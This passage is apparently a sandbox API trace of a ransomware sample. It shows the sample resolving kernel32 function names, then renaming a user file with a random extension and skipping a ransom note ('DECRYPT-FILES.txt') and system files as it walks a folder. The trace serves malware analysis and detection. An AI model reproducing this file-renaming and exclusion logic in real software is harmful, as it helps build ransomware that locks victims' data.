returned="CreateFileMappingNumaA" [0080.366] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.366] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.366] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.366] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.366] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.366] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.366] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.366] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.366] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.366] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.366] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.366] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.366] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.367] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.367] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.367] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.367] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.367] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.367] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.367] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.367] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.367] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.367] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.367] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.367] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.367] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.367] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.367] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.368] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.368] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.368] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.368] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.368] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.368] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.368] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.368] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.368] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.368] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.368] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.368] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.369] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.369] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.369] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.369] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.369] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.369] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.369] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.369] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.369] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.369] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.369] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.369] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.369] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.369] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.369] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.369] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.369] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.369] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.370] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.370] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.370] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.370] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.370] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.370] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.370] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.370] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.370] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.370] lstrlenA (lpString="DELETEATOM") returned 10 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.370] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.370] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.370] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.370] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.370] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.370] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.370] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.370] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.370] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.371] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.371] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.371] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.371] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.371] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.371] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.371] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.371] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.371] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.371] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.371] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.371] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.371] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.371] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.371] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.371] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.372] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.372] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.372] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.372] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.372] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.372] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.372] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.372] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.372] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.372] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.372] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.372] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.372] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.372] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink") returned 105 [0080.373] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl") returned 112 [0080.373] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ioffzl"), dwFlags=0x0) returned 1 [0080.373] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.373] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.374] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.374] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0080.374] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.374] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0080.374] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0080.374] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0080.374] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="DECRYPT-FILES.txt") returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="autorun.inf") returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="boot.ini") returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="desktop.ini") returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat") returned -1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="iconcache.db") 